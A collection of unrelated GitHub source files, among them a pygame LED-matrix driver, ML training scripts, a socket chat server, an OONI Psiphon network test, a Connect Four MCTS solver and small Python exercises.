LED] X [{4} LED]'.format(parallel,\n max_number_of_panels//parallel,\n led_rows,\n max_number_of_panels*led_rows//parallel,\n led_cols))\n #the screen is just a single line of panels\n \n options = RGBMatrixOptions()\n options.rows = options.cols = led_rows\n options.parallel = parallel\n options.chain_length = max_number_of_panels//parallel\n options.hardware_mapping = 'regular'\n options.drop_privileges = 0\n self.matrix = RGBMatrix(options = options)\n \n self.double_buffer = self.matrix.CreateFrameCanvas()\n self._screen = init_pygame_display((max_number_of_panels//parallel)*led_rows, \n led_cols*parallel)\n else: \n print('Going on the standart screen...') \n pygame.init()\n self._screen = pygame.display.set_mode((width*demo,height*demo),0, 32)\n \n \n self.clock = pygame.time.Clock()\n self.fps = 15 \n \n \n def setup(self):\n pass\n\n def logic_loop(self):\n pass\n \n def graphics_loop(self):\n pass\n \n def run(self):\n if self.gamepad:\n try:\n self.start_gamepad()\n except Exception as e:\n print(\"Error starting gamepad\") \n print(e) \n self.close()\n raise e\n self.setup()\n \n if self.demo:\n draw = self.draw_demo\n else:\n draw = self.draw_murapix\n while self.RUNNING:\n self.logic_loop()\n self.graphics_loop()\n draw()\n self.clock.tick(self.fps)\n \n self.close()\n \n def draw_demo(self):\n demo = self.demo\n width = self.width\n height = self.height\n pygame.transform.scale(self.scratch,\n (width*demo,height*demo),\n self._screen)\n pygame.display.flip()\n \n def draw_murapix(self):\n scratch = self.scratch\n screen = self._screen\n mapping = self.mapping\n led_rows = self.led_rows\n led_cols = self.led_cols\n parallel = self.parallel\n curr_chain_row = 0\n NoP_per_chain = int(self.max_number_of_panels/parallel)\n \n #now blit each simulated panel in a row onto screen in the order \n #indicated by the mapping in the config file. \n #TODO: may be more efficient by vectorizing & using blits() instead of blit()\n for i, n in enumerate(mapping):#x, rows\n for j, m in enumerate(n):#y, panel number\n if m is None:\n continue\n #find in which chain \"m\" is\n curr_chain_row = int((m-1)/NoP_per_chain)\n \n #print into a square that fits hzeller doc led addressing\n #see https://github.com/hzeller/rpi-rgb-led-matrix/blob/master/wiring.md#chains \n screen.blit(scratch,#surface to take from\n #LED (row,col) on the lined up panels\n (led_rows*((m-(NoP_per_chain*curr_chain_row))-1),\n curr_chain_row*led_cols),\n #rectangle to extract from the width*height scratch surface\n area=pygame.Rect((led_rows*j,led_rows*i),\n (led_rows,led_rows)))\n \n \n \n py_im = pygame.image.tostring(screen, \"RGB\",False)\n pil_im = Image.frombytes(\"RGB\",screen.get_size(),py_im)\n self.double_buffer.SetImage(pil_im)\n self.matrix.SwapOnVSync(self.double_buffer)\n \n def start_gamepad(self):\n assert os.path.isfile(self.gamepad), \"self.gamepad must be a path to an SVG file\"\n self.p = set_up_gamepad(self.gamepad)\n self.draw_select_gamepads()\n pygame.joystick.quit()\n pygame.joystick.init()\n \n \n def draw_select_gamepads(self):\n rect_area = get_largest_rect_add(self.led_rows,self.mapping)\n ((left, top),(width, height)) = rect_area\n not_selected = True\n no_gamepad = True\n active_joystick = False\n fontsize = 3*width//18-1\n top = top + (height-fontsize*4)//2\n font = pygame.font.Font(None, fontsize)\n text = font.render(\"Players connected:\",\n False,\n (255,255,255),\n (0,0,0))\n text_end0 = font.render(\"Press any key\",\n False,\n (255,255,255),\n (0,0,0))\n text_end1 = font.render(\" to start\",\n False,\n (255,255,255),\n (0,0,0))\n \n if self.demo:\n draw = self.draw_demo\n else:\n draw = self.draw_murapix\n \n while not_selected:\n self.clock.tick(self.fps)\n NoJS = [x.startswith('js') for x in os.listdir(\"/dev/input\")].count(True)\n \n text_NoP = font.render(str(NoJS),\n False,\n (255,255,255),\n (0,0,0))\n if NoJS>0 and no_gamepad:\n no_gamepad = False\n pygame.joystick.quit()\n pygame.joystick.init()\n active_joystick = pygame.joystick.Joystick(0)\n active_joystick.init()\n \n \n for event in pygame.event.get():\n if (active_joystick and event.type == pgl.JOYBUTTONDOWN):\n not_selected = False\n print('{} players selected'.format(NoJS))\n \n \n tw , th = font.size(\"Players connected:\")\n self.scratch.blit(text,(left+(width-tw)//2,top))\n self.scratch.blit(text_NoP,(left+width//2,top+1*fontsize))\n tw , th = font.size(\"Press any key\")\n self.scratch.blit(text_end0,(left+(width-tw)//2,top+2*fontsize))\n tw , th = font.size(\" to start\")\n self.scratch.blit(text_end1,(left+(width-tw)//2,top+3*fontsize))\n draw()\n \n def close(self):\n #https://stackoverflow.com/questions/2638909/killing-a-subprocess-including-its-children-from-python\n \n if self.gamepad:\n try:\n os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)\n except Exception as e:\n print(\"Error trying to kill gamepad node and its children\")\n print(e)\n \n \n pygame.quit()\n sys.exit()\n\n def quit_gracefully(self,sig,frame):\n print('\\n### {} was catched, terminating ###'.format(signal.Signals(sig).name))\n self.RUNNING = False\n self.close()\n","repo_name":"murapixrepo/murapix","sub_path":"murapix.py","file_name":"murapix.py","file_ext":"py","file_size_in_byte":17150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74332999846","text":"import os, sys, time, json\nimport time\nimport utils\nfrom utils import recorder\n\nfrom data import HSIDataLoader \nfrom new_data import create_data_loader\nfrom trainer import get_trainer, BaseTrainer, CrossTransformerTrainer\nimport evaluation\n\n\ndef train_by_param(param):\n #0. recorder reset防止污染数据\n recorder.reset()\n # 1. 数据生成\n dataloader = HSIDataLoader(param)\n train_loader, test_loader = dataloader.generate_torch_dataset() \n # train_loader, test_loader, all_data_loader, _ = create_data_loader() \n\n # 2. 训练和测试\n trainer = get_trainer(param)\n trainer.train(train_loader, test_loader)\n eval_res = trainer.final_eval(test_loader)\n\n #3. record all information\n recorder.record_param(param)\n recorder.record_eval(eval_res)\n \n return eval_res\n\n\n# include_path = {\n# 'conv2d.json',\n# 'vit_30.json',\n# }\n\ninclude_path = {\n # 'conv3d.json',\n # 'conv2d.json',\n # 'conv1d.json',\n # 'vit_30.json',\n 'cross_param.json'\n}\n\ndef run_all():\n save_path_prefix = './res/'\n if not os.path.exists(save_path_prefix):\n os.makedirs(save_path_prefix)\n\n for name in include_path:\n path_param = './params/%s' % name\n with open(path_param, 'r') as fin:\n param = json.loads(fin.read())\n print('start to train %s...' % name)\n eval_res = train_by_param(param)\n print('model eval done of %s...' % name)\n path = '%s/%s' % (save_path_prefix, name) \n recorder.to_file(path)\n\n \n\ndef run_diffusion():\n path_param = './params/cross_param.json'\n with open(path_param, 'r') as fin:\n param = json.loads(fin.read())\n path_prefix = './res/patch_8_pca_2000'\n if not os.path.exists(path_prefix):\n os.makedirs(path_prefix)\n\n for t in [5,10,100,200,500]:\n for index in [0,1,2]:\n name = \"t%s_%s_full.pkl.npy\" % (t, index)\n print('start to train %s...' % name)\n param['diffusion_data_sign'] = name\n eval_res = train_by_param(param)\n print('model eval done of %s...' % name)\n path = '%s/indian_diffusion_%s' % (path_prefix, name) \n recorder.to_file(path)\n\n\n\n\nif __name__ == \"__main__\":\n # run_diffusion()\n run_all()\n \n \n\n\n\n\n","repo_name":"chenning0115/hypercodes_for_diffusion","sub_path":"codes/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24108816973","text":"import re\nimport sys\n\n\"\"\" ниже преобразования встроенными функциями \"\"\"\n\nurl_start = ('www.', 'http://', 'https://')\nurl_ends = ('.ru', '.com', '.рф', '.org', '.net')\n\n\ndef is_it_url (s):\n \"\"\" поиск строки, начинающейся с url_start и заканчивающейся url_ends \"\"\"\n for something in url_start:\n if s.startswith(something):\n for anything in url_ends:\n if s.endswith(anything):\n return True\n #else:\n #return False\n\n \n\ndef is_it_email (s):\n \"\"\" поиск строки, имеющей одну собачку и домен из url_ends \"\"\"\n if s.find('@') != -1:\n for something in url_ends:\n if s.endswith(something):\n return True\n #else:\n #return False\n\n\ndef is_it_threedigits (s):\n if len(s)>3 and s.isdigit():\n return True\n else: return False\n\n\ns = input('Введите строку ')\ntry: \n new_string = ''\n \n strings = s.split(' ')\n for string in strings:\n replace = ''\n if is_it_url(string):\n replace = '[ссылка запрещена]'\n elif is_it_email(string):\n replace = '[контакты запрещены]'\n elif is_it_threedigits(string):\n continue\n if len(replace) > 0:\n new_string += replace + ' '\n else:\n new_string += string + ' ' \n\n \"\"\" ниже преобразования регулярными выражениями \"\"\"\n \n new_string_regular = re.sub(r'\\w',s[0], s[0]) + re.sub(r'\\w', lambda get_low: get_low.group(0).lower(), s[1:]) #тут первым символом я так поняла может быть символ в любом регистре\n new_string_regular = re.sub(r'\\b(?:(?:http[s]?|ftp):\\/\\/|www\\.)[-a-z0-9|:.?&+=]*(?:(\\.ru|\\.com|\\.рф|\\.org|\\.net))', '[Ссылка запрещена]' , new_string_regular)\n new_string_regular = re.sub(r'[-a-z0-9|.]*@*[-a-z0-9|:.]*(?:(\\.ru|\\.com|\\.рф|\\.org|\\.net))', '[Контакты запрещены]', new_string_regular)\n new_string_regular = re.sub(r'\\s\\d\\d\\d\\d+' , '' , new_string_regular)\n\n \"\"\" Вывод результатов преобразований встроенными функциями и регулярными выражениями\"\"\"\n \n print('Преобразования встроенными функциями... ')\n print(new_string[1] + new_string[2:].lower()) \n print('Преобразование с помощью регулярный выражений... ')\n print(new_string_regular)\n \nexcept IndexError:\n print('Строка пуста... ')\nexcept Exception:\n print(\"Unexpected error:\", sys.exc_info()[0])\n\n\n","repo_name":"Tanya-atatakai/Python_Homeworks","sub_path":"3_2_change_strings/3_2_change_strings.py","file_name":"3_2_change_strings.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34702529245","text":"from sqlalchemy import *\nfrom SQLA_Base import Base\nfrom sqlalchemy.orm import relationship\n\nclass Facility_Types(Base):\n # defines different facility facility_types\n __tablename__ = 'facility_types'\n id = Column(Integer, primary_key=True)\n Fac_Type = Column(String(), unique=True)\n facility_chars = relationship(\"Facility_Chars\") #setup 1:many relationship between table noted in this line, and this class\n facility_type_has_nel = relationship(\"Facility_Type_Has_NEL\") #setup 1:many relationship between table noted in this line, and this class\n\n def __repr__(self):\n return \"\" % (\n self.id, self.Fac_Type)\n","repo_name":"mallen69/C-Users-micha-Desktop-DevLeague-Begins-Nov-7-2017-Project_Sprint_7","sub_path":"Sprint03_Data_Operation/_jonhonda_dat/special_prj/SQLA_DB_facility_types.py","file_name":"SQLA_DB_facility_types.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28398909735","text":"class Solution(object):\n def fullJustify(self, words, maxWidth):\n \"\"\"\n :type words: List[str]\n :type maxWidth: int\n :rtype: List[str]\n \"\"\"\n res = []\n res_list = []\n curr = []\n count, pos = 0, 0\n while pos < len(words):\n word = words[pos]\n if len(word) > maxWidth:\n pos += 1\n if len(word) + count + len(curr)<= maxWidth:\n count += len(word)\n curr.append(word)\n pos += 1\n else:\n res_list.append(curr)\n curr = []\n count = 0\n if len(curr) > 0:\n res_list.append(curr)\n # print res_list\n for index, curr in enumerate(res_list):\n text = ''\n remain = sum([len(t) for t in curr])\n if len(curr) == 1:\n # single word\n text = curr[0] + ' ' * (maxWidth - remain)\n elif index == len(res_list) - 1:\n # last line\n text = ' '.join(curr)\n text += ' ' * (maxWidth - remain - len(curr) + 1)\n else:\n # multiple\n step = (maxWidth - remain) // (len(curr) - 1 )\n extra = (maxWidth - remain) % (len(curr) - 1 )\n for index in range(len(curr) - 1):\n text += curr[index] + ' ' * step\n if extra > 0:\n # assign from left\n text += ' '\n extra -= 1\n text += curr[-1]\n res.append(text)\n return res","repo_name":"yangliunk1987/LearningLeetcode","sub_path":"068.Text_Justification/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14615793586","text":"class DictShop(dict):\n def __init__(self, *args, **kwargs):\n if len(args) == 0:\n self.shop_dict = {}\n elif type(args[0]) is dict:\n for i in args[0]:\n self.__check_key(i)\n super().__init__(args[0])\n else:\n raise TypeError('аргумент должен быть словарем')\n\n def __setitem__(self, key, value):\n self.__check_key(key)\n self.shop_dict[key] = value.d\n\n @staticmethod\n def __check_key(key):\n if not isinstance(key, Thing):\n raise TypeError('ключами могут быть только объекты класса Thing')\n\n\nclass Thing:\n def __init__(self, name, price, weight):\n self.name = name\n self.price = price\n self.weight = weight\n self.d = {'name': self.name, 'price': self.price, 'weight': self.weight}\n\n\nth_1 = Thing('Лыжи', 11000, 1978.55)\nth_2 = Thing('Книга', 1500, 256)\ndict_things = DictShop()\ndict_things[th_1] = th_1\ndict_things[th_2] = th_2\nprint(dict_things.__dict__)\n\nfor x in dict_things:\n print(x.name)\n\ndict_things[1] = th_1 # исключение TypeError","repo_name":"Grino777/OOP_Python","sub_path":"inheritance/4.2.4.py","file_name":"4.2.4.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36872509159","text":"import requests\nimport os\nimport socket\nimport threading\n\n\n\nfrom telegram import envia_msg_telegram\nfrom log import registra_log\nfrom servidor import clients\nfrom rss_config import noticia_rss\n\n\n\ndef comandos(client_socket, address):\n try:\n # Notificar o Telegram sobre a nova conexão\n message = f\"Nova conexão: Cliente {address[0]}:{address[1]} conectado.\"\n envia_msg_telegram(message)\n registra_log(\"INFO\", address, \"Conexão\", message=message)\n history = [] # Lista para armazenar o histórico do cliente\n while True:\n data = client_socket.recv(1024).decode('utf-8')\n if not data:\n print(f\"Cliente {address[0]}:{address[1]} desconectado.\")\n break\n\n if data == \"/q\":\n print(f\"Cliente {address[0]}:{address[1]} solicitou desconexão.\")\n registra_log(\"INFO\", address, \"solicitação\", message=\"Solicitou desconexão\")\n break\n elif data == \"/l\":\n print(f\"Cliente {address[0]}:{address[1]} solicitou listar clientes.\")\n registra_log(\"INFO\", address, \"solicitação\", message=\"Solicitou Listar Clientes\")\n response = \"\\n\".join(f\"{addr[0]}:{addr[1]}\" for addr in clients.keys())\n client_socket.send(response.encode('utf-8'))\n elif data.startswith(\"/m:\"):\n parts = data.split(\":\", 3)\n if len(parts) == 4:\n _, dest_ip, dest_port, message = parts\n dest_port = int(dest_port)\n envia_msg(address, dest_ip, dest_port, message)\n response = f\"Mensagem enviada para {dest_ip}:{dest_port}.\"\n registra_log(\"INFO\", address, \"Mensagem\", message=\"{message} Enviada para {dest_ip}:{dest_port}\")\n else:\n response = \"Comando /m inválido. Uso correto: /m:ip_destino:porta:mensagem\"\n client_socket.send(response.encode('utf-8'))\n elif data.startswith(\"/b:\"):\n message = data[3:]\n msg_geral(address, message)\n msglog=message\n response = \"Mensagem enviada para todos os clientes conectados.\"\n registra_log(\"INFO\", address, \"Mensagem\", message=f\"Mensagem {msglog} Enviada para todos\")\n client_socket.send(response.encode('utf-8'))\n elif data == \"/h\":\n response = \"\\n\".join(history) # Envia o histórico para o cliente\n registra_log(\"INFO\", address, \"Solicitação\", message=\"Solicitou Historico\")\n client_socket.send(response.encode('utf-8'))\n elif data == \"/?\":\n response = \"Comandos disponíveis:\\n/q - Desconectar\\n/l - Listar clientes conectados\\n/m:ip_destino:porta:mensagem - Enviar mensagem privada\\n/b:mensagem - Enviar mensagem para todos\\n/h - Ver histórico\\n/? - Ajuda\\n/rss:palavra_chave - Listar as 10 notícias mais recentes com a palavra-chave em RSS\\n/f - Listar arquivos na pasta /server_files\\n/w:url - Fazer download do arquivo da URL para a pasta /server_files\\n/d:nome_arquivo - Fazer download do arquivo do servidor para o cliente\"\n client_socket.send(response.encode('utf-8'))\n elif data.startswith(\"/rss:\"):\n registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou Noticias\")\n keyword = data[5:]\n news = noticia_rss(keyword)\n if news:\n response = \"\\n\".join(news)\n else:\n response = f\"Nenhuma notícia encontrada com a palavra-chave: {keyword}\"\n client_socket.send(response.encode('utf-8'))\n elif data.startswith(\"/w:\"):\n registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou Dowload\")\n url = data[3:]\n baixar_url(url)\n response = f\"Arquivo da URL {url} baixado e salvo em /server_files.\"\n client_socket.send(response.encode('utf-8'))\n elif data == \"/f\":\n registra_log(\"INFO\", address, \"Mensagem\", message=\"Solicitou lista de arquivos do servidor\")\n response = listar_arqv()\n client_socket.send(response.encode('utf-8'))\n else:\n response = \"Comando inválido. Use '/q' para desconectar, '/l' para listar clientes, '/m:ip_destino:porta:mensagem' para enviar uma mensagem privada, '/b:mensagem' para enviar uma mensagem para todos, '/h' para ver o histórico, '/?' para ver os comandos disponíveis, '/rss:palavra_chave' para listar as 10 notícias mais recentes com a palavra-chave em RSS, '/f' para listar os arquivos na pasta /server_files, '/w:url' para fazer download de um arquivo da URL fornecida ou '/d:nome_arquivo' para fazer download de um arquivo do servidor para o cliente.\"\n client_socket.send(response.encode('utf-8'))\n\n # Adiciona o comando/mensagem ao histórico do cliente\n history.append(data)\n except Exception as e:\n print(f\"Erro na conexão com {address[0]}:{address[1]}: {e}\")\n finally:\n client_socket.close()\n del clients[address]\n\n\n\ndef envia_msg(sender_address, dest_ip, dest_port, message):\n try:\n if (dest_ip, dest_port) in clients:\n dest_socket = clients[(dest_ip, dest_port)]\n dest_socket.send(f\"Mensagem de {sender_address[0]}:{sender_address[1]}: {message}\".encode('utf-8'))\n else:\n raise Exception(f\"Cliente {dest_ip}:{dest_port} não encontrado.\")\n except Exception as e:\n print(f\"Erro ao enviar mensagem para {dest_ip}:{dest_port}: {e}\")\n\ndef msg_geral(sender_address, message):\n for client_socket in clients.values():\n if client_socket != sender_address:\n client_socket.send(f\"Mensagem de {sender_address[0]}:{sender_address[1]} para todos: {message}\".encode('utf-8'))\n\n\n\n\n\"\"\"\n Função para baixar um arquivo a partir de uma URL e salvá-lo na pasta /server_files.\n\n Parâmetros:\n url (str): A URL do arquivo a ser baixado.\n file_name (str): O nome do arquivo a ser salvo.\n\n Essa função utiliza a biblioteca requests para fazer o download do arquivo a partir da URL.\n O arquivo é baixado em pedaços e salvo na pasta /server_files com o nome especificado.\n\"\"\"\ndef baixar_url(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n file_name = url.split(\"/\")[-1]\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"server_files\", file_name)\n with open(file_path, \"wb\") as file:\n file.write(response.content)\n else:\n print(f\"Erro ao fazer download do arquivo da URL: {url}. Código de resposta: {response.status_code}\")\n except Exception as e:\n print(f\"Erro ao fazer download do arquivo da URL: {url}: {e}\")\n\n\n\n\"\"\"\n Função para listar os arquivos (nome e tamanho) contidos na pasta /server_files do servidor.\n\n Essa função utiliza a biblioteca os para obter uma lista de arquivos na pasta /server_files.\n Para cada arquivo encontrado, a função obtém o nome e o tamanho do arquivo.\n A lista resultante contém tuplas no formato (nome do arquivo, tamanho do arquivo).\n\"\"\"\ndef listar_arqv():\n files_list = []\n folder_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"server_files\")\n if os.path.exists(folder_path) and os.path.isdir(folder_path):\n for file_name in os.listdir(folder_path):\n file_path = os.path.join(folder_path, file_name)\n if os.path.isfile(file_path):\n file_size = os.path.getsize(file_path)\n files_list.append(f\"{file_name} - {file_size} bytes\")\n if files_list:\n return \"\\n\".join(files_list)\n return \"Nenhum arquivo encontrado na pasta /server_files.\"\n\n\n\ndef start_server():\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind(('0.0.0.0', 8888))\n server_socket.listen(5)\n print(\"Servidor iniciado. Aguardando conexões...\")\n\n while True:\n client_socket, address = server_socket.accept()\n print(f\"Cliente {address[0]}:{address[1]} conectado.\")\n clients[address] = client_socket\n client_handler = threading.Thread(target=comandos, args=(client_socket, address))\n client_handler.start()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mizaelarthur/Programacao-para-redes","sub_path":"ProjetoProgRedes/comunicação_cliente.py","file_name":"comunicação_cliente.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23725459694","text":"# Inicia a variável fatorial com o valor 1 e recebe como input os minutos do usuário:\nfatorial = 1\ncontador = int(input(\"Digite os minutos atuais da máquina: \"))\n\n# Executa um laço do tipo while, fazendo a multiplicação do fatorial e decrescendo 1 da variável contador,\n# até que o valor da variável contador seja maior que zero:\nwhile contador > 0:\n fatorial *= contador\n contador -= 1\n\n# Lança o output informando a senha:\nprint(f\"\\nLIBERDADE{fatorial}\")\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"fiap/atividades/fase_2_prototyping/cap_3_andar_em_circulos/RM99070_EX04.py","file_name":"RM99070_EX04.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7577551095","text":"import tempfile\nimport os\nimport sys\n\nfrom twisted.internet import defer, reactor\nfrom twisted.internet.error import ProcessExitedAlready\nfrom twisted.python import usage\n\nfrom ooni.utils import log, net\nfrom ooni.templates import process, httpt\n\n\nclass UsageOptions(usage.Options):\n optParameters = [\n ['psiphonpath', 'p', None, 'Specify psiphon python client path.'],\n ['url', 'u', net.GOOGLE_HUMANS[0],\n 'Specify the URL to fetch over psiphon (default: http://www.google.com/humans.txt).'],\n ['expected-body', 'e', net.GOOGLE_HUMANS[1],\n 'Specify the beginning of the expected body in the response (default: ' + net.GOOGLE_HUMANS[1] + ').']\n ]\n\nclass PsiphonTest(httpt.HTTPTest, process.ProcessTest):\n\n \"\"\"\n This class tests Psiphon python client\n\n test_psiphon:\n Starts a Psiphon, check if it bootstraps successfully\n (print a line in stdout).\n Then, perform an HTTP request using the proxy\n \"\"\"\n\n name = \"Psiphon Test\"\n description = (\"Bootstraps Psiphon and \"\n \"does a HTTP GET for the specified URL.\")\n author = \"juga\"\n version = \"0.2.0\"\n timeout = 120\n usageOptions = UsageOptions\n\n def _setUp(self):\n self.localOptions['socksproxy'] = '127.0.0.1:1080'\n super(PsiphonTest, self)._setUp()\n\n def setUp(self):\n log.debug('PsiphonTest.setUp')\n\n self.report['bootstrapped_success'] = None\n self.report['request_success'] = None\n self.report['psiphon_found'] = None\n self.report['default_configuration'] = True\n\n self.bootstrapped = defer.Deferred()\n self.url = self.localOptions['url']\n\n if self.localOptions['url'] != net.GOOGLE_HUMANS[0]:\n self.report['default_configuration'] = False\n\n if self.localOptions['expected-body'] != net.GOOGLE_HUMANS[1]:\n self.report['default_configuration'] = False\n\n if self.localOptions['psiphonpath']:\n self.psiphonpath = self.localOptions['psiphonpath']\n else:\n # Psiphon is not installable and to run it manually, it has to be\n # run from the psiphon directory, so it wouldn't make sense to\n # install it in the PATH. For now, we assume that Psiphon sources\n # are in the user's home directory.\n from os import path, getenv\n self.psiphonpath = path.join(\n getenv('HOME'), 'psiphon-circumvention-system/pyclient/pyclient')\n log.debug('psiphon path: %s' % self.psiphonpath)\n\n def createCommand(self):\n # psi_client.py can not be run directly because the paths in the\n # code are relative, so it'll fail to execute from this test\n x = \"\"\"\nfrom psi_client import connect\nconnect(False)\n\"\"\"\n f = tempfile.NamedTemporaryFile(delete=False)\n f.write(x)\n f.close()\n self.command = [sys.executable, f.name]\n log.debug('command: %s' % ' '.join(self.command))\n\n def handleRead(self, stdout, stderr):\n if 'Press Ctrl-C to terminate.' in self.processDirector.stdout:\n if not self.bootstrapped.called:\n # here the text 'Press Ctrl-C to terminate.' has been found\n # and it was to call doRequest\n self.report['bootstrapped_success'] = True\n log.debug(\"PsiphonTest: calling bootstrapped.callback\")\n self.bootstrapped.callback(None)\n\n def test_psiphon(self):\n log.debug('PsiphonTest.test_psiphon')\n self.createCommand()\n if not os.path.exists(self.psiphonpath):\n log.err('psiphon path does not exists, is it installed?')\n self.report['psiphon_found'] = False\n log.debug(\"Adding %s to report\" % self.report)\n # XXX: the original code written by juga0 readed\n # > return defer.succeed(None)\n # but this caused `ooniprobe -ng` to hang forever, so I\n # rewrote the code to return a deferred and simulate calling\n # its callback method, to trigger an event.\n # -sbs\n reactor.callLater(0.0, self.bootstrapped.callback, None)\n return self.bootstrapped\n\n self.report['psiphon_found'] = True\n log.debug(\"Adding %s to report\" % self.report)\n\n # Using pty to see output lines as soon as they get wrotten in the\n # buffer, otherwise the test might not see lines until the buffer is\n # full with some block size and therefore the test would\n # terminate with error\n finished = self.run(self.command,\n env=dict(PYTHONPATH=self.psiphonpath),\n path=self.psiphonpath,\n usePTY=1)\n # here psiphon command has been run, and if it finds the text\n # 'Press Ctrl-C to terminate' in handleRead it will write to the\n # report self.report['bootstrapped_success'] = True\n self.report['bootstrapped_success'] = False\n\n def callDoRequest(_):\n log.debug(\"PsiphonTest.callDoRequest: %r\" %(_,))\n d = self.doRequest(self.url)\n def addSuccessToReport(res):\n log.debug(\"PsiphonTest.callDoRequest.addSuccessToReport\")\n if res.body.startswith(self.localOptions['expected-body']):\n self.report['request_success'] = True\n else:\n self.report['request_success'] = False\n\n return res\n d.addCallback(addSuccessToReport)\n def addFailureToReport(res):\n log.debug(\"PsiphonTest.callDoRequest.addFailureToReport. res=%r\" % (res,))\n self.report['request_success'] = False\n return res\n d.addErrback(addFailureToReport)\n return d\n self.bootstrapped.addCallback(callDoRequest)\n\n def cleanup(_):\n log.debug('PsiphonTest:cleanup')\n try:\n self.processDirector.transport.signalProcess('INT')\n except ProcessExitedAlready:\n pass\n os.remove(self.command[1])\n return finished\n\n self.bootstrapped.addBoth(cleanup)\n return self.bootstrapped\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/third_party/psiphon.py","file_name":"psiphon.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"45028043085","text":"import time\nimport math\nimport random\nfrom typing import List, Optional, Union\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .c4_board import C4Board\n\n\nclass C4Node:\n def __init__(self, input_board: C4Board, parent: Optional[\"C4Node\"] = None):\n self.board: C4Board = input_board\n self.parent: Optional[\"C4Node\"] = parent\n self.children: List[\"C4Node\"] = []\n self.wins: int = 0\n self.visits: int = 0\n\n def add_child(self, child_node) -> None:\n self.children.append(child_node)\n\n def update(self, result) -> None:\n self.visits += 1\n self.wins += result\n\n def fully_expanded(self) -> bool:\n return len(self.children) == len(self.board.get_next_possible_moves())\n\n def best_child(self, c_param: Union[int, float] = 1.4) -> Optional[\"C4Node\"]:\n best_score = float(\"-inf\")\n best_child = None\n for child in self.children:\n if child.visits == 0:\n child_score = float(\"inf\")\n else:\n child_score = float(\n (child.wins / child.visits)\n + c_param * ((2 * math.log(self.visits) / child.visits) ** 0.5)\n )\n if child_score > best_score:\n best_score = child_score\n best_child = child\n if best_child is None: # TODO: replace with logging\n message = len(self.children)\n raise Exception(\"No best child found. Children: \" + str(message))\n return best_child\n\n\nclass C4MCTreeSearch:\n def __init__(self, input_board: C4Board):\n self.root = C4Node(input_board)\n\n def selection(self) -> Optional[C4Node]:\n current_node = self.root\n while current_node.fully_expanded():\n if len(current_node.board.get_next_possible_moves()) == 0:\n return None\n node = current_node.best_child()\n if node is None: # to satisfy mypy\n return None\n current_node = node\n return current_node\n\n def expansion(self, node: C4Node):\n possible_moves = node.board.get_next_possible_moves()\n for move in possible_moves:\n next_board = node.board.with_move(move, node.board.get_next_player())\n child_node = C4Node(next_board, node)\n node.add_child(child_node)\n\n def simulation(self, node: C4Node):\n current_board = node.board\n while current_board.get_winner() is None:\n move = random.choice(current_board.get_next_possible_moves())\n current_board = current_board.with_move(\n move, current_board.get_next_player()\n )\n winner = current_board.get_winner()\n agent_to_make_move = self.root.board.get_next_player()\n if winner == agent_to_make_move:\n return 1\n if winner == \" \":\n return 0\n return -1\n\n def backpropagation(self, node, result):\n while node is not None:\n node.update(result)\n node = node.parent\n\n def run_simulation(self):\n selected_node = self.selection()\n if selected_node is None:\n return\n self.expansion(selected_node)\n result = self.simulation(selected_node)\n self.backpropagation(selected_node, result)\n\n def run(self, iterations, num_threads=4):\n with ThreadPoolExecutor(max_workers=num_threads) as executor:\n for _ in range(iterations):\n executor.submit(self.run_simulation)\n return self.root.best_child().board\n\n\nif __name__ == \"__main__\":\n board = C4Board((6, 7), \"11 22\" + \" \" * 36)\n mcts = C4MCTreeSearch(board)\n start_time = time.time()\n new_board = mcts.run(1000)\n end_time = time.time()\n print(\"Time to run: \", end_time - start_time)\n print(board.find_move_position(new_board.state))\n print(new_board.state.replace(\" \", \"_\"))\n \"\"\"for child in mcts.root.children:\n print(\n \"Board:\",\n child.board.state.replace(\" \", \"_\"),\n \"wins:\",\n child.wins,\n \" visits:\",\n child.visits,\n )\"\"\"\n","repo_name":"Nootonium/AIPlaymaker","sub_path":"src/connect_four/c4_mcts.py","file_name":"c4_mcts.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26659426618","text":"import asyncio\nimport websockets\nimport pathlib\nimport ssl\n\nssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\nlocalhost_pem = pathlib.Path(__file__).with_name(\"localhost.pem\")\nssl_context.load_verify_locations(localhost_pem)\n\nasync def hola():\n uri = \"wss://localhost:8888\"\n async with websockets.connect(uri, ssl=ssl_context) as websocket:\n nombre = input('Dime tu nombre:')\n\n await websocket.send(nombre)\n print(f\">>>{nombre}\")\n\n saludo = await websocket.recv()\n print(f\"<<< {saludo}\")\n\nif 